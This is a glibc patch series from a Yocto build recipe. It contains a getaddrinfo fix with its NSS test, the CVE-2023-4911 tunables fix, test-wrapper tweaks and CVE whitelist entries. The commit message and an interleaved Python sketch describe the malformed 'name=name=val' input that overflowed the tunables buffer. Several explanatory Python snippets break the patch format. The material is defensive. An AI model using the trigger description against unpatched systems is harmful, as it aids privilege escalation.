++#include <support/xunistd.h>
++
++enum
++{
++ ACTION_MERGE = 0,
++ ACTION_CONTINUE,
++};
++
++static const char *
++family_str (int family)
++{
++ switch (family)
++ {
++ case AF_UNSPEC:
++ return "AF_UNSPEC";
++ case AF_INET:
++ return "AF_INET";
++ default:
++ __builtin_unreachable ();
++ }
++}
++
++static const char *
++action_str (int action)
++{
++ switch (action)
++ {
++ case ACTION_MERGE:
++ return "merge";
++ case ACTION_CONTINUE:
++ return "continue";
++ default:
++ __builtin_unreachable ();
++ }
++}
++
++static void
++do_one_test (int action, int family, bool canon)
++{
++ struct addrinfo hints =
++ {
++ .ai_family = family,
++ };
++
++ struct addrinfo *ai;
++
++ if (canon)
++ hints.ai_flags = AI_CANONNAME;
++
++ printf ("***** Testing \"files [SUCCESS=%s] files\" for family %s, %s\n",
++ action_str (action), family_str (family),
++ canon ? "AI_CANONNAME" : "");
++
++ int ret = getaddrinfo ("example.org", "80", &hints, &ai);
++
++ switch (action)
++ {
++ case ACTION_MERGE:
++ if (ret == 0)
++ {
++ char *formatted = support_format_addrinfo (ai, ret);
++
++ printf ("merge unexpectedly succeeded:\n %s\n", formatted);
++ support_record_failure ();
++ free (formatted);
++ }
++ else
++ return;
++ case ACTION_CONTINUE:
++ {
++ char *formatted = support_format_addrinfo (ai, ret);
++
++ /* Verify that the result appears exactly once. */
++ const char *expected = "address: STREAM/TCP 192.0.0.1 80\n"
++ "address: DGRAM/UDP 192.0.0.1 80\n"
++ "address: RAW/IP 192.0.0.1 80\n";
++
++ const char *contains = strstr (formatted, expected);
++ const char *contains2 = NULL;
++
++ if (contains != NULL)
++ contains2 = strstr (contains + strlen (expected), expected);
++
++ if (contains == NULL || contains2 != NULL)
++ {
++ printf ("continue failed:\n%s\n", formatted);
++ support_record_failure ();
++ }
++
++ free (formatted);
++ break;
++ }
++ default:
++ __builtin_unreachable ();
++ }
++}
++
++static void
++do_one_test_set (int action)
++{
++ char buf[32];
++
++ snprintf (buf, sizeof (buf), "files [SUCCESS=%s] files",
++ action_str (action));
++ __nss_configure_lookup ("hosts", buf);
++
++ do_one_test (action, AF_UNSPEC, false);
++ do_one_test (action, AF_INET, false);
++ do_one_test (action, AF_INET, true);
++}
++
++static int
++do_test (void)
++{
++ do_one_test_set (ACTION_CONTINUE);
++ do_one_test_set (ACTION_MERGE);
++ return 0;
++}
++
++#include <support/test-driver.c>
+diff --git a/nss/tst-nss-gai-actions.root/etc/host.conf b/nss/tst-nss-gai-actions.root/etc/host.conf
+new file mode 100644
+index 0000000000..d1a59f73a9
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.root/etc/host.conf
+@@ -0,0 +1 @@
++multi on
+diff --git a/nss/tst-nss-gai-actions.root/etc/hosts b/nss/tst-nss-gai-actions.root/etc/hosts
+new file mode 100644
+index 0000000000..50ce9774dc
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.root/etc/hosts
+@@ -0,0 +1,508 @@
++192.0.0.1 example.org
++192.0.0.2 example.org
++192.0.0.3 example.org
++192.0.0.4 example.org
++192.0.0.5 example.org
++192.0.0.6 example.org
++192.0.0.7 example.org
++192.0.0.8 example.org
++192.0.0.9 example.org
++192.0.0.10 example.org
++192.0.0.11 example.org
++192.0.0.12 example.org
++192.0.0.13 example.org
++192.0.0.14 example.org
++192.0.0.15 example.org
++192.0.0.16 example.org
++192.0.0.17 example.org
++192.0.0.18 example.org
++192.0.0.19 example.org
++192.0.0.20 example.org
++192.0.0.21 example.org
++192.0.0.22 example.org
++192.0.0.23 example.org
++192.0.0.24 example.org
++192.0.0.25 example.org
++192.0.0.26 example.org
++192.0.0.27 example.org
++192.0.0.28 example.org
++192.0.0.29 example.org
++192.0.0.30 example.org
++192.0.0.31 example.org
++192.0.0.32 example.org
++192.0.0.33 example.org
++192.0.0.34 example.org
++192.0.0.35 example.org
++192.0.0.36 example.org
++192.0.0.37 example.org
++192.0.0.38 example.org
++192.0.0.39 example.org
++192.0.0.40 example.org
++192.0.0.41 example.org
++192.0.0.42 example.org
++192.0.0.43 example.org
++192.0.0.44 example.org
++192.0.0.45 example.org
++192.0.0.46 example.org
++192.0.0.47 example.org
++192.0.0.48 example.org
++192.0.0.49 example.org
++192.0.0.50 example.org
++192.0.0.51 example.org
++192.0.0.52 example.org
++192.0.0.53 example.org
++192.0.0.54 example.org
++192.0.0.55 example.org
++192.0.0.56 example.org
++192.0.0.57 example.org
++192.0.0.58 example.org
++192.0.0.59 example.org
++192.0.0.60 example.org
++192.0.0.61 example.org
++192.0.0.62 example.org
++192.0.0.63 example.org
++192.0.0.64 example.org
++192.0.0.65 example.org
++192.0.0.66 example.org
++192.0.0.67 example.org
++192.0.0.68 example.org
++192.0.0.69 example.org
++192.0.0.70 example.org
++192.0.0.71 example.org
++192.0.0.72 example.org
++192.0.0.73 example.org
++192.0.0.74 example.org
++192.0.0.75 example.org
++192.0.0.76 example.org
++192.0.0.77 example.org
++192.0.0.78 example.org
++192.0.0.79 example.org
++192.0.0.80 example.org
++192.0.0.81 example.org
++192.0.0.82 example.org
++192.0.0.83 example.org
++192.0.0.84 example.org
++192.0.0.85 example.org
++192.0.0.86 example.org
++192.0.0.87 example.org
++192.0.0.88 example.org
++192.0.0.89 example.org
++192.0.0.90 example.org
++192.0.0.91 example.org
++192.0.0.92 example.org
++192.0.0.93 example.org
++192.0.0.94 example.org
++192.0.0.95 example.org
++192.0.0.96 example.org
++192.0.0.97 example.org
++192.0.0.98 example.org
++192.0.0.99 example.org
++192.0.0.100 example.org
++192.0.0.101 example.org
++192.0.0.102 example.org
++192.0.0.103 example.org
++192.0.0.104 example.org
++192.0.0.105 example.org
++192.0.0.106 example.org
++192.0.0.107 example.org
++192.0.0.108 example.org
++192.0.0.109 example.org
++192.0.0.110 example.org
++192.0.0.111 example.org
++192.0.0.112 example.org
++192.0.0.113 example.org
++192.0.0.114 example.org
++192.0.0.115 example.org
++192.0.0.116 example.org
++192.0.0.117 example.org
++192.0.0.118 example.org
++192.0.0.119 example.org
++192.0.0.120 example.org
++192.0.0.121 example.org
++192.0.0.122 example.org
++192.0.0.123 example.org
++192.0.0.124 example.org
++192.0.0.125 example.org
++192.0.0.126 example.org
++192.0.0.127 example.org
++192.0.0.128 example.org
++192.0.0.129 example.org
++192.0.0.130 example.org
++192.0.0.131 example.org
++192.0.0.132 example.org
++192.0.0.133 example.org
++192.0.0.134 example.org
++192.0.0.135 example.org
++192.0.0.136 example.org
++192.0.0.137 example.org
++192.0.0.138 example.org
++192.0.0.139 example.org
++192.0.0.140 example.org
++192.0.0.141 example.org
++192.0.0.142 example.org
++192.0.0.143 example.org
++192.0.0.144 example.org
++192.0.0.145 example.org
++192.0.0.146 example.org
++192.0.0.147 example.org
++192.0.0.148 example.org
++192.0.0.149 example.org
++192.0.0.150 example.org
++192.0.0.151 example.org
++192.0.0.152 example.org
++192.0.0.153 example.org
++192.0.0.154 example.org
++192.0.0.155 example.org
++192.0.0.156 example.org
++192.0.0.157 example.org
++192.0.0.158 example.org
++192.0.0.159 example.org
++192.0.0.160 example.org
++192.0.0.161 example.org
++192.0.0.162 example.org
++192.0.0.163 example.org
++192.0.0.164 example.org
++192.0.0.165 example.org
++192.0.0.166 example.org
++192.0.0.167 example.org
++192.0.0.168 example.org
++192.0.0.169 example.org
++192.0.0.170 example.org
++192.0.0.171 example.org
++192.0.0.172 example.org
++192.0.0.173 example.org
++192.0.0.174 example.org
++192.0.0.175 example.org
++192.0.0.176 example.org
++192.0.0.177 example.org
++192.0.0.178 example.org
++192.0.0.179 example.org
++192.0.0.180 example.org
++192.0.0.181 example.org
++192.0.0.182 example.org
++192.0.0.183 example.org
++192.0.0.184 example.org
++192.0.0.185 example.org
++192.0.0.186 example.org
++192.0.0.187 example.org
++192.0.0.188 example.org
++192.0.0.189 example.org
++192.0.0.190 example.org
++192.0.0.191 example.org
++192.0.0.192 example.org
++192.0.0.193 example.org
++192.0.0.194 example.org
++192.0.0.195 example.org
++192.0.0.196 example.org
++192.0.0.197 example.org
++192.0.0.198 example.org
++192.0.0.199 example.org
++192.0.0.200 example.org
++192.0.0.201 example.org
++192.0.0.202 example.org
++192.0.0.203 example.org
++192.0.0.204 example.org
++192.0.0.205 example.org
++192.0.0.206 example.org
++192.0.0.207 example.org
++192.0.0.208 example.org
++192.0.0.209 example.org
++192.0.0.210 example.org
++192.0.0.211 example.org
++192.0.0.212 example.org
++192.0.0.213 example.org
++192.0.0.214 example.org
++192.0.0.215 example.org
++192.0.0.216 example.org
++192.0.0.217 example.org
++192.0.0.218 example.org
++192.0.0.219 example.org
++192.0.0.220 example.org
++192.0.0.221 example.org
++192.0.0.222 example.org
++192.0.0.223 example.org
++192.0.0.224 example.org
++192.0.0.225 example.org
++192.0.0.226 example.org
++192.0.0.227 example.org
++192.0.0.228 example.org
++192.0.0.229 example.org
++192.0.0.230 example.org
++192.0.0.231 example.org
++192.0.0.232 example.org
++192.0.0.233 example.org
++192.0.0.234 example.org
++192.0.0.235 example.org
++192.0.0.236 example.org
++192.0.0.237 example.org
++192.0.0.238 example.org
++192.0.0.239 example.org
++192.0.0.240 example.org
++192.0.0.241 example.org
++192.0.0.242 example.org
++192.0.0.243 example.org
++192.0.0.244 example.org
++192.0.0.245 example.org
++192.0.0.246 example.org
++192.0.0.247 example.org
++192.0.0.248 example.org
++192.0.0.249 example.org
++192.0.0.250 example.org
++192.0.0.251 example.org
++192.0.0.252 example.org
++192.0.0.253 example.org
++192.0.0.254 example.org
++192.0.1.1 example.org
++192.0.1.2 example.org
++192.0.1.3 example.org
++192.0.1.4 example.org
++192.0.1.5 example.org
++192.0.1.6 example.org
++192.0.1.7 example.org
++192.0.1.8 example.org
++192.0.1.9 example.org
++192.0.1.10 example.org
++192.0.1.11 example.org
++192.0.1.12 example.org
++192.0.1.13 example.org
++192.0.1.14 example.org
++192.0.1.15 example.org
++192.0.1.16 example.org
++192.0.1.17 example.org
++192.0.1.18 example.org
++192.0.1.19 example.org
++192.0.1.20 example.org
++192.0.1.21 example.org
++192.0.1.22 example.org
++192.0.1.23 example.org
++192.0.1.24 example.org
++192.0.1.25 example.org
++192.0.1.26 example.org
++192.0.1.27 example.org
++192.0.1.28 example.org
++192.0.1.29 example.org
++192.0.1.30 example.org
++192.0.1.31 example.org
++192.0.1.32 example.org
++192.0.1.33 example.org
++192.0.1.34 example.org
++192.0.1.35 example.org
++192.0.1.36 example.org
++192.0.1.37 example.org
++192.0.1.38 example.org
++192.0.1.39 example.org
++192.0.1.40 example.org
++192.0.1.41 example.org
++192.0.1.42 example.org
++192.0.1.43 example.org
++192.0.1.44 example.org
++192.0.1.45 example.org
++192.0.1.46 example.org
++192.0.1.47 example.org
++192.0.1.48 example.org
++192.0.1.49 example.org
++192.0.1.50 example.org
++192.0.1.51 example.org
++192.0.1.52 example.org
++192.0.1.53 example.org
++192.0.1.54 example.org
++192.0.1.55 example.org
++192.0.1.56 example.org
++192.0.1.57 example.org
++192.0.1.58 example.org
++192.0.1.59 example.org
++192.0.1.60 example.org
++192.0.1.61 example.org
++192.0.1.62 example.org
++192.0.1.63 example.org
++192.0.1.64 example.org
++192.0.1.65 example.org
++192.0.1.66 example.org
++192.0.1.67 example.org
++192.0.1.68 example.org
++192.0.1.69 example.org
++192.0.1.70 example.org
++192.0.1.71 example.org
++192.0.1.72 example.org
++192.0.1.73 example.org
++192.0.1.74 example.org
++192.0.1.75 example.org
++192.0.1.76 example.org
++192.0.1.77 example.org
++192.0.1.78 example.org
++192.0.1.79 example.org
++192.0.1.80 example.org
++192.0.1.81 example.org
++192.0.1.82 example.org
++192.0.1.83 example.org
++192.0.1.84 example.org
++192.0.1.85 example.org
++192.0.1.86 example.org
++192.0.1.87 example.org
++192.0.1.88 example.org
++192.0.1.89 example.org
++192.0.1.90 example.org
++192.0.1.91 example.org
++192.0.1.92 example.org
++192.0.1.93 example.org
++192.0.1.94 example.org
++192.0.1.95 example.org
++192.0.1.96 example.org
++192.0.1.97 example.org
++192.0.1.98 example.org
++192.0.1.99 example.org
++192.0.1.100 example.org
++192.0.1.101 example.org
++192.0.1.102 example.org
++192.0.1.103 example.org
++192.0.1.104 example.org
++192.0.1.105 example.org
++192.0.1.106 example.org
++192.0.1.107 example.org
++192.0.1.108 example.org
++192.0.1.109 example.org
++192.0.1.110 example.org
++192.0.1.111 example.org
++192.0.1.112 example.org
++192.0.1.113 example.org
++192.0.1.114 example.org
++192.0.1.115 example.org
++192.0.1.116 example.org
++192.0.1.117 example.org
++192.0.1.118 example.org
++192.0.1.119 example.org
++192.0.1.120 example.org
++192.0.1.121 example.org
++192.0.1.122 example.org
++192.0.1.123 example.org
++192.0.1.124 example.org
++192.0.1.125 example.org
++192.0.1.126 example.org
++192.0.1.127 example.org
++192.0.1.128 example.org
++192.0.1.129 example.org
++192.0.1.130 example.org
++192.0.1.131 example.org
++192.0.1.132 example.org
++192.0.1.133 example.org
++192.0.1.134 example.org
++192.0.1.135 example.org
++192.0.1.136 example.org
++192.0.1.137 example.org
++192.0.1.138 example.org
++192.0.1.139 example.org
++192.0.1.140 example.org
++192.0.1.141 example.org
++192.0.1.142 example.org
++192.0.1.143 example.org
++192.0.1.144 example.org
++192.0.1.145 example.org
++192.0.1.146 example.org
++192.0.1.147 example.org
++192.0.1.148 example.org
++192.0.1.149 example.org
++192.0.1.150 example.org
++192.0.1.151 example.org
++192.0.1.152 example.org
++192.0.1.153 example.org
++192.0.1.154 example.org
++192.0.1.155 example.org
++192.0.1.156 example.org
++192.0.1.157 example.org
++192.0.1.158 example.org
++192.0.1.159 example.org
++192.0.1.160 example.org
++192.0.1.161 example.org
++192.0.1.162 example.org
++192.0.1.163 example.org
++192.0.1.164 example.org
++192.0.1.165 example.org
++192.0.1.166 example.org
++192.0.1.167 example.org
++192.0.1.168 example.org
++192.0.1.169 example.org
++192.0.1.170 example.org
++192.0.1.171 example.org
++192.0.1.172 example.org
++192.0.1.173 example.org
++192.0.1.174 example.org
++192.0.1.175 example.org
++192.0.1.176 example.org
++192.0.1.177 example.org
++192.0.1.178 example.org
++192.0.1.179 example.org
++192.0.1.180 example.org
++192.0.1.181 example.org
++192.0.1.182 example.org
++192.0.1.183 example.org
++192.0.1.184 example.org
++192.0.1.185 example.org
++192.0.1.186 example.org
++192.0.1.187 example.org
++192.0.1.188 example.org
++192.0.1.189 example.org
++192.0.1.190 example.org
++192.0.1.191 example.org
++192.0.1.192 example.org
++192.0.1.193 example.org
++192.0.1.194 example.org
++192.0.1.195 example.org
++192.0.1.196 example.org
++192.0.1.197 example.org
++192.0.1.198 example.org
++192.0.1.199 example.org
++192.0.1.200 example.org
++192.0.1.201 example.org
++192.0.1.202 example.org
++192.0.1.203 example.org
++192.0.1.204 example.org
++192.0.1.205 example.org
++192.0.1.206 example.org
++192.0.1.207 example.org
++192.0.1.208 example.org
++192.0.1.209 example.org
++192.0.1.210 example.org
++192.0.1.211 example.org
++192.0.1.212 example.org
++192.0.1.213 example.org
++192.0.1.214 example.org
++192.0.1.215 example.org
++192.0.1.216 example.org
++192.0.1.217 example.org
++192.0.1.218 example.org
++192.0.1.219 example.org
++192.0.1.220 example.org
++192.0.1.221 example.org
++192.0.1.222 example.org
++192.0.1.223 example.org
++192.0.1.224 example.org
++192.0.1.225 example.org
++192.0.1.226 example.org
++192.0.1.227 example.org
++192.0.1.228 example.org
++192.0.1.229 example.org
++192.0.1.230 example.org
++192.0.1.231 example.org
++192.0.1.232 example.org
++192.0.1.233 example.org
++192.0.1.234 example.org
++192.0.1.235 example.org
++192.0.1.236 example.org
++192.0.1.237 example.org
++192.0.1.238 example.org
++192.0.1.239 example.org
++192.0.1.240 example.org
++192.0.1.241 example.org
++192.0.1.242 example.org
++192.0.1.243 example.org
++192.0.1.244 example.org
++192.0.1.245 example.org
++192.0.1.246 example.org
++192.0.1.247 example.org
++192.0.1.248 example.org
++192.0.1.249 example.org
++192.0.1.250 example.org
++192.0.1.251 example.org
++192.0.1.252 example.org
++192.0.1.253 example.org
++192.0.1.254 example.org
+diff --git a/sysdeps/posix/getaddrinfo.c b/sysdeps/posix/getaddrinfo.c
+index 18dccd5924..3d9bea60c6 100644
+--- a/sysdeps/posix/getaddrinfo.c
++++ b/sysdeps/posix/getaddrinfo.c
+@@ -458,11 +458,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
+
+ if (name != NULL)
+ {
+- at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
+- at->family = AF_UNSPEC;
+- at->scopeid = 0;
+- at->next = NULL;
+-
+ if (req->ai_flags & AI_IDN)
+ {
+ char *out;
+@@ -473,13 +468,21 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ malloc_name = true;
+ }
+
+- if (__inet_aton_exact (name, (struct in_addr *) at->addr) != 0)
++ uint32_t addr[4];
++ if (__inet_aton_exact (name, (struct in_addr *) addr) != 0)
+ {
++ at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
++ at->scopeid = 0;
++ at->next = NULL;
++
+ if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET)
+- at->family = AF_INET;
++ {
++ memcpy (at->addr, addr, sizeof (at->addr));
++ at->family = AF_INET;
++ }
+ else if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED))
+ {
+- at->addr[3] = at->addr[0];
++ at->addr[3] = addr[0];
+ at->addr[2] = htonl (0xffff);
+ at->addr[1] = 0;
+ at->addr[0] = 0;
+@@ -505,49 +505,62 @@
+
+ if (req->ai_flags & AI_CANONNAME)
+ canon = name;
++
++ goto process_list;
+ }
+- else if (at->family == AF_UNSPEC)
++
++ char *scope_delim = strchr (name, SCOPE_DELIMITER);
++ int e;
++
++ if (scope_delim == NULL)
++ e = inet_pton (AF_INET6, name, addr);
++ else
++ e = __inet_pton_length (AF_INET6, name, scope_delim - name, addr);
++
++ if (e > 0)
+ {
+- char *scope_delim = strchr (name, SCOPE_DELIMITER);
+- int e;
+- if (scope_delim == NULL)
+- e = inet_pton (AF_INET6, name, at->addr);
++ at = alloca_account (sizeof (struct gaih_addrtuple),
++ alloca_used);
++ at->scopeid = 0;
++ at->next = NULL;
++
++ if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
++ {
++ memcpy (at->addr, addr, sizeof (at->addr));
++ at->family = AF_INET6;
++ }
++ else if (req->ai_family == AF_INET
++ && IN6_IS_ADDR_V4MAPPED (addr))
++ {
++ at->addr[0] = addr[3];
++ at->addr[1] = addr[1];
++ at->addr[2] = addr[2];
++ at->addr[3] = addr[3];
++ at->family = AF_INET;
++ }
+ else
+- e = __inet_pton_length (AF_INET6, name, scope_delim - name,
+- at->addr);
+- if (e > 0)
+ {
+- if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
+- at->family = AF_INET6;
+- else if (req->ai_family == AF_INET
+- && IN6_IS_ADDR_V4MAPPED (at->addr))
+- {
+- at->addr[0] = at->addr[3];
+- at->family = AF_INET;
+- }
+- else
+- {
+- result = -EAI_ADDRFAMILY;
+- goto free_and_return;
+- }
+-
+- if (scope_delim != NULL
+- && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
+- scope_delim + 1,
+- &at->scopeid) != 0)
+- {
+- result = -EAI_NONAME;
+- goto free_and_return;
+- }
++ result = -EAI_ADDRFAMILY;
++ goto free_and_return;
++ }
+
+- if (req->ai_flags & AI_CANONNAME)
+- canon = name;
++ if (scope_delim != NULL
++ && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
++ scope_delim + 1,
++ &at->scopeid) != 0)
++ {
++ result = -EAI_NONAME;
++ goto free_and_return;
+ }
++
++ if (req->ai_flags & AI_CANONNAME)
++ canon = name;
++
++ goto process_list;
+ }
+
+- if (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0)
++ if ((req->ai_flags & AI_NUMERICHOST) == 0)
+ {
+- struct gaih_addrtuple **pat = &at;
+ int no_data = 0;
+ int no_inet6_data = 0;
+ service_user *nip;
+@@ -543,6 +559,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ enum nss_status status = NSS_STATUS_UNAVAIL;
+ int no_more;
+ struct resolv_context *res_ctx = NULL;
++ bool do_merge = false;
+
+ /* If we do not have to look for IPv6 addresses or the canonical
+ name, use the simple, old functions, which do not support
+@@ -579,7 +596,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ result = -EAI_MEMORY;
+ goto free_and_return;
+ }
+- *pat = addrmem;
++ at = addrmem;
+ }
+ else
+ {
+@@ -632,6 +649,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ }
+
+ struct gaih_addrtuple *addrfree = addrmem;
++ struct gaih_addrtuple **pat = &at;
++
+ for (int i = 0; i < air->naddrs; ++i)
+ {
+ socklen_t size = (air->family[i] == AF_INET
+@@ -695,12 +714,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
+
+ free (air);
+
+- if (at->family == AF_UNSPEC)
+- {
+- result = -EAI_NONAME;
+- goto free_and_return;
+- }
+-
+ goto process_list;
+ }
+ else if (err == 0)
+@@ -750,6 +763,22 @@
+
+ while (!no_more)
+ {
++ /* Always start afresh; continue should discard previous results
++ and the hosts database does not support merge. */
++ at = NULL;
++ free (canonbuf);
++ free (addrmem);
++ canon = canonbuf = NULL;
++ addrmem = NULL;
++ got_ipv6 = false;
++
++ if (do_merge)
++ {
++ __set_h_errno (NETDB_INTERNAL);
++ __set_errno (EBUSY);
++ break;
++ }
++
+ no_data = 0;
+ nss_gethostbyname4_r fct4 = NULL;
+
+@@ -744,12 +773,14 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ {
+ while (1)
+ {
+- status = DL_CALL_FCT (fct4, (name, pat,
++ status = DL_CALL_FCT (fct4, (name, &at,
+ tmpbuf->data, tmpbuf->length,
+ &errno, &h_errno,
+ NULL));
+ if (status == NSS_STATUS_SUCCESS)
+ break;
++ /* gethostbyname4_r may write into AT, so reset it. */
++ at = NULL;
+ if (status != NSS_STATUS_TRYAGAIN
+ || errno != ERANGE || h_errno != NETDB_INTERNAL)
+ {
+@@ -774,7 +805,9 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ no_data = 1;
+
+ if ((req->ai_flags & AI_CANONNAME) != 0 && canon == NULL)
+- canon = (*pat)->name;
++ canon = at->name;
++
++ struct gaih_addrtuple **pat = &at;
+
+ while (*pat != NULL)
+ {
+@@ -826,6 +859,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
+
+ if (fct != NULL)
+ {
++ struct gaih_addrtuple **pat = &at;
++
+ if (req->ai_family == AF_INET6
+ || req->ai_family == AF_UNSPEC)
+ {
+@@ -917,6 +946,10 @@
+ if (nss_next_action (nip, status) == NSS_ACTION_RETURN)
+ break;
+
++ /* The hosts database does not support MERGE. */
++ if (nss_next_action (nip, status) == NSS_ACTION_MERGE)
++ do_merge = true;
++
+ if (nip->next == NULL)
+ no_more = -1;
+ else
+@@ -930,7 +969,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ }
+
+ process_list:
+- if (at->family == AF_UNSPEC)
++ if (at == NULL)
+ {
+ result = -EAI_NONAME;
+ goto free_and_return;
+--
+2.39.3
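For reference, a rough Python analogue of what the new tst-nss-gai-actions test above asserts (with "files [SUCCESS=continue] files" as the hosts database, each address must be reported exactly once) is sketched below. It is an illustrative sketch only, not part of the backported patch; it reuses the test's example.org name and assumes that name resolves via /etc/hosts.

import socket

# Resolve the name and verify that no (family, type, sockaddr) tuple is
# returned more than once; the C test checks the same condition by
# searching its formatted output for a duplicated address block.
results = socket.getaddrinfo("example.org", 80)
seen = [(fam, typ, sockaddr) for fam, typ, _, _, sockaddr in results]
assert len(seen) == len(set(seen)), "duplicate addresses returned"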
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
new file mode 100644
index 0000000000..4d3146509a
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
@@ -0,0 +1,63 @@
+From d2b77337f734fcacdfc8e0ddec14cf31a746c7be Mon Sep 17 00:00:00 2001
+From: Siddhesh Poyarekar <siddhesh@redhat.com>
+Date: Mon, 11 Sep 2023 18:53:15 -0400
+Subject: [PATCH v2] tunables: Terminate immediately if end of input is reached
+
+The string parsing routine may end up writing beyond the bounds of tunestr
+if the input tunable string is malformed, of the form name=name=val.
+This gets processed twice, first as name=name=val and next as name=val,
+resulting in tunestr being name=name=val:name=val, thus overflowing
+tunestr.
+
+Terminate the parsing loop as soon as the end of input is reached so that
+tunestr does not overflow.
+---
+Changes from v1:
+
+- Also null-terminate tunestr before exiting.
+
+ elf/dl-tunables.c | 17 ++++++++++-------
+ 1 file changed, 10 insertions(+), 7 deletions(-)
+
+Upstream-Status: Backport [git://sourceware.org/git/glibc.git]
+CVE: CVE-2023-4911
+
+diff --git a/elf/dl-tunables.c b/elf/dl-tunables.c
+index 8e7ee9df10..76cf8b9da3 100644
+--- a/elf/dl-tunables.c
++++ b/elf/dl-tunables.c
+@@ -187,11 +187,7 @@ parse_tunables (char *tunestr, char *valstring)
+ /* If we reach the end of the string before getting a valid name-value
+ pair, bail out. */
+ if (p[len] == '\0')
+- {
+- if (__libc_enable_secure)
+- tunestr[off] = '\0';
+- return;
+- }
++ break;
+
+ /* We did not find a valid name-value pair before encountering the
+ colon. */
+@@ -251,9 +247,16 @@ parse_tunables (char *tunestr, char *valstring)
+ }
+ }
+
+- if (p[len] != '\0')
+- p += len + 1;
++ /* We reached the end while processing the tunable string. */
++ if (p[len] == '\0')
++ break;
++
++ p += len + 1;
+ }
++
++ /* Terminate tunestr before we leave. */
++ if (__libc_enable_secure)
++ tunestr[off] = '\0';
+ }
+ #endif
+
+--
+2.41.0
+
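To make the overflow described in the commit message above concrete, here is a rough Python sketch of the double match on a malformed name=name=val entry. It is illustrative only, deliberately simplified, and not the elf/dl-tunables.c logic; the tunable name is just an example.

def sketch_parse(tunestr):
    # Each candidate name=value pair is copied out, then the remainder
    # after the first '=' is scanned again, which is where the second,
    # duplicated copy of a malformed entry comes from.
    # (Simplified: models a single malformed entry, not the full
    # ':'-separated tunables syntax.)
    copies = []
    p = tunestr
    while "=" in p:
        copies.append(p)
        _, _, p = p.partition("=")
    return ":".join(copies)

env = "glibc.malloc.mxfast=glibc.malloc.mxfast=4096"
out = sketch_parse(env)
print(len(env), len(out))  # the copy is longer than the original string,
                           # which is what overflows the fixed-size tunestr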
diff --git a/meta/recipes-core/glibc/glibc/check-test-wrapper b/meta/recipes-core/glibc/glibc/check-test-wrapper
index f8e04e02d2..5cc993f718 100644
--- a/meta/recipes-core/glibc/glibc/check-test-wrapper
+++ b/meta/recipes-core/glibc/glibc/check-test-wrapper
@@ -2,6 +2,7 @@
import sys
import os
import subprocess
+import resource
env = os.environ.copy()
args = sys.argv[1:]
@@ -44,12 +45,20 @@ if targettype == "user":
qemuargs += ["-L", sysroot]
qemuargs += ["-E", "LD_LIBRARY_PATH={}".format(":".join(libpaths))]
command = qemuargs + args
+
+ # We've seen qemu-arm using up all system memory for some glibc
+ # tests e.g. nptl/tst-pthread-timedlock-lockloop
+ # Cap at 8GB since no test should need more than that
+ # (5GB adds 7 failures for qemuarm glibc test run)
+ limit = 8*1024*1024*1024
+ resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
+
elif targettype == "ssh":
host = os.environ.get("SSH_HOST", None)
user = os.environ.get("SSH_HOST_USER", None)
port = os.environ.get("SSH_HOST_PORT", None)
- command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no"]
+ command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no", "-o", "LogLevel=quiet"]
if port:
command += ["-p", str(port)]
if not host:
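For anyone unfamiliar with the RLIMIT_AS cap added above, a minimal standalone sketch of the same mechanism follows. The values and the spawned command are illustrative, not taken from the wrapper.

import resource
import subprocess

# Cap this process's address space at 8 GiB.  Resource limits are
# inherited by child processes, so any qemu started afterwards cannot
# allocate more than that; oversized allocations fail instead of
# exhausting the build host's memory.
limit = 8 * 1024 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))

subprocess.run(["qemu-arm", "--version"])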
diff --git a/meta/recipes-core/glibc/glibc_2.31.bb b/meta/recipes-core/glibc/glibc_2.31.bb
index 3d486fbb59..296c892994 100644
--- a/meta/recipes-core/glibc/glibc_2.31.bb
+++ b/meta/recipes-core/glibc/glibc_2.31.bb
@@ -1,7 +1,40 @@
require glibc.inc
require glibc-version.inc
-CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752"
+CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752 \
+ CVE-2021-27645 CVE-2021-3326 CVE-2020-27618 CVE-2020-29562 CVE-2019-25013 \
+ CVE-2022-23218 CVE-2022-23219 \
+"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010022
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010023
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010024
+# Upstream glibc maintainers dispute there is any issue and have no plans to address it further.
+# "this is being treated as a non-security bug and no real threat."
+CVE_CHECK_WHITELIST += "CVE-2019-1010022 CVE-2019-1010023 CVE-2019-1010024"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010025
+# Allows an ASLR bypass, so it can weaken some hardening; it is not an exploit in itself,
+# but it may make another one easier. "ASLR bypass itself is not a vulnerability."
